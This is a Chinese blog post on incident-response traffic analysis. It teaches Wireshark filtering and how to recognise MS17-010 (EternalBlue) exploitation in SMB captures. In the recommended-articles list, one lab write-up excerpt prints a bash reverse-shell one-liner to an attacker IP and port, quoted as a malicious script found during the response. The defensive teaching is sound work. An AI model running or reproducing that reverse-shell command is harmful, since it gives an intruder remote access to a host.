应急响应-流量分析

最新推荐文章于 2025-03-10 22:11:38 发布
最新推荐文章于 2025-03-10 22:11:38 发布
阅读量1k 收藏 12
点赞数 9
分类专栏: 应急响应 文章标签: 网络 linux 运维 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_50765147/article/details/135892160
版权

在应急响应中,有时需要用到流量分析工具,。当需要看到内部流量的具体情况时,就需要我们对网络通信进行抓包,并对数据包进行过滤分析,最常用的工具是Wireshark。

  • Wireshark是一个网络封包分析软件。网络封包分析软件的功能是获取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPcap作为接口,直接与网卡进行数据报文交换。
  • 在打开Wireshark后,需要对要获取流量的网卡进行选择。在选择网卡后,就可以获取相关的数据流量包了,Wireshark界面如图所示。

  • 在应急响应中,对应监听获取后的流量,还需要进行提取过滤。Wireshark的筛选器可以很好地完成这个功能。Wireshark的筛选器可以找出所希望进行分析的数据包。简单来说,筛选器就是定义了一定条件,用来包含或者排除数据包的表达式,从而达到筛选出自己想要的数据包的目的。筛选器也支持与(and)、或(or)、非(not)等逻辑运算符,可以提高筛选效率。
常用的过滤器命令
对特定IP进行过滤
  • 使用【ip.addr == ip】命令,可对特定IP地址进行过滤。对192.168.198.225IP地址进行过滤,如图所示。

对指定的源IP地址进行过滤
  • 使用【ip.src == ip】 命令,可对指定的源IP地址进行过滤。对源IP地址192.168.198.225进行过滤,如图所示。

对协议进行筛选
  • 直接输入HTTP、HTTPS、SMTP、ARP等协议进行筛选,如图所示。

对端口进行过滤
  • 使用【tcp.port == 端口号】或【udp.port ==端口号】命令,可对端口进行过滤。使用【tcp.port==445】命令对445端口进行过滤,如图所示。

对关键字进行检索
  • 使用【tcp contains strings】命令,可对数据包中的关键字进行检索,对流量中包含某一关键字的数据包进行筛选。使用【 tcp contains baidu】命令进行筛选baidu关键字,如图所示。

永痕之蓝利用
  • 以MS17-010流量分析为例,具体介绍相关用法。MS17-010是“永痕之蓝”漏洞,自2017年被曝光后,WannaCry勒索病毒利用此漏洞迅速感染蔓延,引发标志性的安全事件。之后各种恶意软件(无论是勒索病毒,还是挖坑软件),在攻击载荷中都会加入“永痕之蓝”漏洞的攻击方法。
  • 打开一个获取到的MS17-010的流量包,发现其中有SMB协议流量包,如图所示。

  • 因为MS17-010漏洞是通过SMB协议进行攻击的,所以下一步可对SMB协议端口进行筛选。输入【SMB】命令,筛选SMB协议流量,如图所示。

  • 攻击载荷一般会发送NT Trans Request载荷,里面有大量的NOP指令,如图所示。

  • 在发送NT Trans Request载荷后,会发送Trans2 Secondary Request载荷,相关的Trans2 Secondary Request载荷会分几个数据包发送加密的攻击载荷,如图所示。

  • 在攻击载荷发送完后,如果发现数据包中存在Multiplex ID:82数据包,说明漏洞攻击成功,如图所示。

应急响应(日志/流量)
nigo134的博客
03-25 4803
事件分类 有害程序事件 网络攻击事件 信息破坏事件 事件内容安全事件 设备设施故障事件 灾害性事件 其它事件 应急响应工作流程 准备阶段 应急团队建设 应急方案制定 等级保护测评 检测阶段 判断安全设备告警 判断事件类型 判断事件级别 确定应急方案 抑制阶段 阻断:封禁IP、断开网络连接.隔离失陷主机 排查:排查可疑进程、排查可疑服务、审计各类日志、排查可疑账户、排查可疑文件 根除阶段 修复:系统漏洞.网站漏洞 更新:安全策略、威胁情报 还原:操作系统.业务系统 恢复
网络安全应急响应-流量分析技术
Bnessy
03-24 4658
Wireshark全流量分析 1. 时间设置 在Wireshark中看到的时间默认为Seconds Since Beginning of Capture,即时间戳为秒格式,从捕捉开始计时,以后的时间是距离第一个捕获包的时间间隔。 日期和时间(1970-01-01 01:02:03.123456):显示日期和每天的时间-时间格式(年月日,时分秒)。 时间(01:02:03.123456):只显示时间-日期格式(时分秒格式)。 自1970-01-01经过的秒数:格式为1234567890.123456,时间
应急响应--流量分析
leaf_lucky的博客
03-10 1174
固定的user-agent头:老版本的cobalt strike中user-agent头是固定不变的,可以作为一个特征,新版本的cobalt strike中的user-agent头是会每次都变化的。在流量中,通过http协议的url路径,在checksum8解密算法计算后,32位的后门得到的结果是92,64位的后门得到的结果是93,该特征符合未魔改Cobalt Strike的流量特征。例如,在cobalt strike4.8中两个不同的cobalt strike数据包的user-agent头是不同的。
应急响应流量分析?你会吗?
qq_59468567的博客
03-22 440
1、如何区分菜刀、蚁剑、冰蝎、哥斯拉WENSHELL特征?(经典问题)​​​​​​​。5、说下服务器被上传webshell处置思路是什么?3、根据设备告警(WEB)如何分析流量?3、说说钓鱼邮件处置实际操作。2、流量检测的设备你了解吗?1、Windows应急响应。2、Linux应急响应。4、如何确认是否误报?
流量分析与日志溯源的个人理解
qax
12-09 4535
下面是我结合网上论坛以及个人的一些想法针对日志分析溯源的个人理解 现阶段大部分企业都会上日志审计设备,在配上流量分光,还有各类IDS、WAF等设备日志,对安全溯源分析十分方便,但在日常工作中,免不了要直接看服务器相关请求日志的情况,这个时候就需要我们自身具备日志分析的能力了。 一、日志分析流程 1、统计 首先需要对数据进行处理,如请求IP统计,访问地址统计,HTTP状态码统计等,这些数据统计可以使用excel或者python脚本,如果手头有各类工具那就更容易统计了。2、威胁发现 关键字过...
玄机应急响应哥斯拉4.0-流量分析
Lucker_YYY的博客
09-24 955
ssh查看服务器history得到将/tmp/pam_unix.so复制到了/lib/x86_64-linux-gnu/security/pam_unix.so。将pam_unix.so文件下载下来ida打开分析查看函数pam_sm_authenticate 这个函数是用来控制认证的,pam后门常常放在这里。黑客留下后门的反连的IP和PORT是什么?黑客连接webshell时查询当前shell的权限是什么?黑客连接webshell后执行的第一条命令是什么?黑客通过什么漏洞进入服务器的(提交cve编号)
5、应急响应-拒绝服务&钓鱼识别&DDOS压力测试&邮件反制分析&应用日志
m0_65842464的博客
01-27 885
了解和分析应用日志,识别钓鱼邮件并溯源反制,DDOS攻击与CC攻击的测试和防御CC攻击(即“拒绝服务攻击”的一种攻击形式)是一种通过向目标服务器发送大量请求来使其无法正常工作的攻击方式。攻击者通常使用大量的计算机或者僵尸网络来发起攻击,从而使目标服务器的带宽、CPU或内存等资源被耗尽,导致服务器无法正常响应请求。CC攻击是一种常见的网络攻击方式,可以对网站、应用程序、网络服务等造成。DDOS攻击是一种通过向目标服务器或网络发送大量流量或请求来使其无法正常工作的攻击方式。
精品干货-Linux 应急响应手册-479页.pdf
03-13
此外,应急响应过程和所采取措施的有效性需要经过审查,并且从经验中学习,不断完善应急响应计划。 整个应急响应过程可能还会涉及法律和合规性问题,特别是如果攻击涉及数据泄露,就需要通知受影响的个人并可能需要...
[ 应急响应工具箱 ] 流量分析工具.rar
02-11
流量分析工具】在网络安全领域扮演着至关重要的角色,它们是应急响应和攻防演练中的得力助手。本文将深入探讨这些工具的功能、用途以及如何有效地利用它们进行网络监控和故障排查。 首先,Wireshark是一款全球...
1+X应急响应网络网络流量分析技术:
ming20211016的博客
11-20 570
其他flow:UDPFlood异常流量:网络蠕虫病毒异常流量分析
linux应急响应&流量分析(附环境)
qq_73870170的博客
12-13 1566
linux应急响应
应急响应-MSF流量分析&模式模块&特征提取
SuperherRo的博客
04-13 2128
战后-流量分析-MSF
SMB流量分析
欢迎光临
09-13 1939
SMB协议流量主要分为以下几个阶段1、 tcp三次握手2、会话建立(Negotiate Protocol):客户端发送Negotiate Protocol Request ,其中包含客户端支持的smb协议版本列表以及SMB Header信息服务端发送Negotiate Protocol Response,包含服务器选择的协议版本、会话密钥 等3、会话设置(Session Setup)首先进行tcp三次握手。
[网安实践III] 实验2.流量分析
LostUnravel的博客
11-09 9233
网安实践III - 实验2.流量分析1 攻击主机信息分析过程2 还原的攻击步骤分析过程步骤还原3 破解的root口令口令过程 1 攻击主机信息 IP地址: 192.168.2.183 MAC地址: PcsCompu_e6:16:43(08:00:27:e6:16:43) 主机域名: kali.lan 分析过程 从 No.72 数据包开始, 可以看到 IP 为 192.168.2.183 的主机向 IP 为 192.168.2.222 的主机发送了大量的 TCP 的 SYN 报文, 而且每次 TCP 的
网络攻击与防御之网络流量分析实验
qq_45722813的博客
03-24 2857
实验一 网络流量分析 本次实验所使用到的主要软件包括:虚拟机(VMware/VirtualBox), 流量分析软件(Wireshark, Zeek或科来网络数据包分析软件),网络扫描工具nmap,浏览器(Chrome或IE)。 每个题目给出主要操作步骤、截图和分析。 一. 虚拟机环境设置与网络配置 使用VMware或VirtualBox创建Linux虚拟机(Ubuntu或 Centos,推荐Ubuntu 18.04); 1.打开VMware,创建新的虚拟机 2.选择使用【典型】,下一步 3.选择【稍后
记一次应急响应实战分析-附加应急响应工具包
告白的博客
10-28 2445
0x00 应急响应安全事件的分类 今天带来一篇实战的应急响应干货分享!最清晰的思路,让小白可以独立支撑应急响应! 常见安全事件的分类 数据安全事件:数据泄露,数据破坏,数据篡改 应用安全事件:网站篡改,sql注入,xss攻击等等 系统安全事件:口令破解,系统提权,木马挖矿等 网络安全事件:DDOS,DNS劫持,ARP欺骗等 应急等级:Ⅰ级,Ⅱ级,Ⅲ级,Ⅳ级 预警等级:红色预警,橙色预警,黄色预警,蓝色预警 事件类型:特别重大,重大,较大,一般 0x01 应急响应准备流程: 响应前期: 1.准备阶段:
SMB攻击利用之-Net use流量数据包逆向分析
村中少年的专栏
05-13 445
本文通过分析已知的net use命令执行share连接流量,分析了SMB,DCE/RPC,kerberos,samr等多种协议的交互逻辑,为日常安全运营,护网HVV,重保过程中遇到的关于smb流量逆向分析提供参考
毕业一年,从事运维感觉没有出路,如何转型更有前景?
Python_0011的博客
07-08 1613
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
应急响应-vulntarget-j-01
最新发布
03-16
### 应急响应中的漏洞目标与配置信息 在应急响应过程中,针对 `vulntarget j 01` 的配置和漏洞目标分析可以分为以下几个方面: #### 1. 环境概述 此题目所描述的是一个中型环境下的应急响应场景[^1]。其核心目的是通过重现攻击路径来帮助应急人员快速定位并确认受害主机中存在的安全漏洞。 #### 2. 攻击路径还原 为了有效还原攻击路径,通常需要关注以下几点: - **日志文件审查**:检查系统日志(如 `/var/log/auth.log`, `/var/log/syslog`),寻找异常登录记录或其他可疑活动。 - **网络连接状态**:利用命令如 `netstat -anp | grep ESTABLISHED` 或者更高级工具(如 Wireshark)捕获实时流量数据。 - **恶意脚本检测**:例如给定的 Bash 脚本可能被用于建立反向 Shell 连接[^3]: ```bash bash -c 'exec bash -i &>/dev/tcp/192.168.138.133/8888 <&1' ``` #### 3. CMS 实战案例解析 根据提供的 Linux 实战题解,在第五章节提到的具体 Flag 值表明该任务涉及到了某种 Web CMS 漏洞利用过程[^2]。此类问题往往源于未及时更新软件版本或者错误的安全配置。 #### 4. 安全加固建议 基于上述发现,可采取如下措施加强防护能力: - 更新所有已知存在风险的应用程序至最新稳定版; - 关闭不必要的服务端口减少暴露面; - 设置强密码策略并启用双因素认证机制; - 对敏感操作实施访问控制列表(ACL),仅允许授权IP地址范围内的请求进入内部网络区域; #### 结论 综上所述,“vulntarget j 01”的主要工作围绕着识别潜在威胁源以及修复相应的弱点展开。这不仅考验技术实力同时也锻炼逻辑思维能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值